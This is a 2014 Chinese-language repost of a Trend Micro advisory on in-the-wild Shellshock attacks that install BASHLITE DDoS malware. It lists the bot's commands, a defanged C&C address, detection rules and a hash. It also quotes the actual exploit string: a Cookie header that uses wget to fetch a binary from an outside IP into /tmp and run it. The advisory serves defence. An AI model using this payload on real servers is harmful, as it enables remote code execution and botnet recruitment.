2014年9月28日 星期日

Shellshock/bash 漏洞攻擊現身,可發動 DDoS 攻擊

Shellshock/bash 漏洞攻擊現身,可發動 DDoS 攻擊

在Shellshock/bash 漏洞(包含在CVE-2014-7169)新聞爆發後短短幾個小時就出現了真實的漏洞攻擊事件。這一個漏洞可以讓人執行任意程式碼,從而影響系統安全。攻擊者可能做出的包括變更網站內容和網站程式碼、污損網站外貌,甚至是從資料庫竊取使用者資料以及其他更多事情。

趨勢科技發現了真實漏洞攻擊碼所帶來惡意軟體的樣本。偵測為ELF_BASHLITE.A(也被稱為ELF_FLOODER.W),此惡意軟體可以發動分散式阻斷服務(DDoS)攻擊。它所會執行的指令包括有:

●PING
●GETLOCALIP
●SCANNER
●HOLD 暫停或是延後攻擊一給定時間
●JUNK 垃圾洪水攻擊
●UDP 用UDP封包做分散式阻斷服務攻擊
●TCP 用TCP封包做分散式阻斷服務攻擊
●KILLATTK – 終止攻擊執行緒
●LOLNOGTFO – 終止僵屍機器人

它也可以做到暴力法登入,讓攻擊者可以取得登入使用者和密碼的列表。根據我們的分析,ELF_BASHLITE.A也會連到 C&C伺服器 – 89[點]238[點]150[點]154[冒號]5。

圖1、威脅感染示意圖

下面是用來帶入惡意軟體進到系統的程式碼:

Cookie:().{.:;.};.wget.-O./tmp/besh.http://162[dot]253[dot]66[dot]76/nginx;.chmod.777./tmp/besh;./tmp/besh;

此漏洞的嚴重性相當巨大,因為主要受影響的是網頁伺服器。它(此漏洞)也對物聯網(IoE ,Internet of Everything)設備帶來風險,因為用的是Linux(內含Bash)。據說它也影響到了比特幣(Bitcoin)/比特幣採礦,因此攻擊者很有可能會透過此途徑來建立起「Botnet傀儡殭屍網路」機器人大軍。

透過網路來對Shellshock漏洞進行攻擊的企圖可以透過下列Deep Discovery規則偵測到:

●1618 – Shellshock HTTP REQUEST
其他趨勢科技產品(趨勢科技的OSCE、IWSVA和PC-cillin)都可以將此網路行為偵測為CVE-2014-6271-SHELLSHOCK_REQUEST。

此外,趨勢科技的Deep Security可以透過以下DPI規則來保護使用者免於此Bash漏洞威脅:

●1006256 – GNU Bash Remote Code Execution Vulnerability
其他想要檢查自己是否受到影響的使用者可以查看Shellshock免費防護。想知道更多可能的Shellshock漏洞攻擊情景,請參考文章 – Shellshock – 它有多嚴重?

此次攻擊的相關雜湊值是0229e6fa359bce01954651df2cdbddcdf3e24776。

原文出處:Bash Vulnerability (Shellshock) Exploit Emerges in the Wild, Leads to BASHLITE Malware
轉載自《網路安全趨勢